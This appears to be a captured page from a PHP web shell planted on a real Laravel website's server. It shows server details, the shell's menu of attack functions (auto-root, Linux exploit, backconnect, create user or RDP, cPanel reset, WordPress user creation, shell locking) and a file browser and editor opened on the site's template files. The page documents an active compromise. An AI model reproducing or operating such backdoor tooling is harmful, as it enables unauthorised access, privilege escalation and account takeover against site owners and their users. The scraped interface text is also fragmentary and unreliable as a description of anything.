Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 162.158.159.99
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
noahresources.com /
source /
resources /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
client_panel
[ DIR ]
drwxr-xr-x
emails
[ DIR ]
drwxr-xr-x
errors
[ DIR ]
drwxr-xr-x
exports
[ DIR ]
drwxr-xr-x
layouts
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
about_us.blade.php
9.98
KB
-rw-r--r--
blogs.blade.php
4.31
KB
-rw-r--r--
contact_us.blade.php
9.56
KB
-rw-r--r--
index.blade.php
31.64
KB
-rw-r--r--
index_old.blade.php
940
B
-rw-r--r--
portfolio.blade.php
14.99
KB
-rw-r--r--
post.blade.php
6.25
KB
-rw-r--r--
practice_area.blade.php
2.1
KB
-rw-r--r--
privacy_security.blade.php
1.62
KB
-rw-r--r--
projects.blade.php
1.68
KB
-rw-r--r--
review.blade.php
9.18
KB
-rw-r--r--
search.blade.php
13.68
KB
-rw-r--r--
service_detail.blade.php
7.23
KB
-rw-r--r--
services.blade.php
2.09
KB
-rw-r--r--
sitemap.blade.php
4.12
KB
-rw-r--r--
sitemapxml.blade.php
2.34
KB
-rw-r--r--
templates.blade.php
42.18
KB
-rw-r--r--
terms.blade.php
2.6
KB
-rw-r--r--
thank_you.blade.php
1.07
KB
-rw-r--r--
welcome.blade.php
72.5
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : privacy_security.blade.php
@extends('layouts.app') @section('contents') <style> .position_top{ background-color: black; } </style> <style> .page-title .content-box .title h1{ font-size:70px; /* margin-top: 60px; */ font-weight: 600; color: #383838; } </style> <!-- Page Title --> <section class="page-title centred" style="background-image: url({{'assets/images/background/page-title.jpg'}});"> <div class="auto-container"> <div class="content-box"> <div class="title"> <h1>{{ $page_detail->page_name }}</h1> </div> </div> </div> </section> <!-- End Page Title --> <!-- about-style-three --> <section class="about-style-three"> <div class="auto-container"> <div class="inner-container"> <div class="row clearfix"> <div class="col-lg-12 col-md-12 col-sm-12 content-column"> <div class="content-box"> <div class="sec-title"> <p>Our {{ $page_detail->page_name }}</p> <h2>{{$page_detail->page_heading}}</h2> </div> <div class="text"> <p>{!! $page_detail->page_content !!}</p> </div> </div> </div> </div> </div> </div> </section> <!-- about-style-three end --> @endsection
Close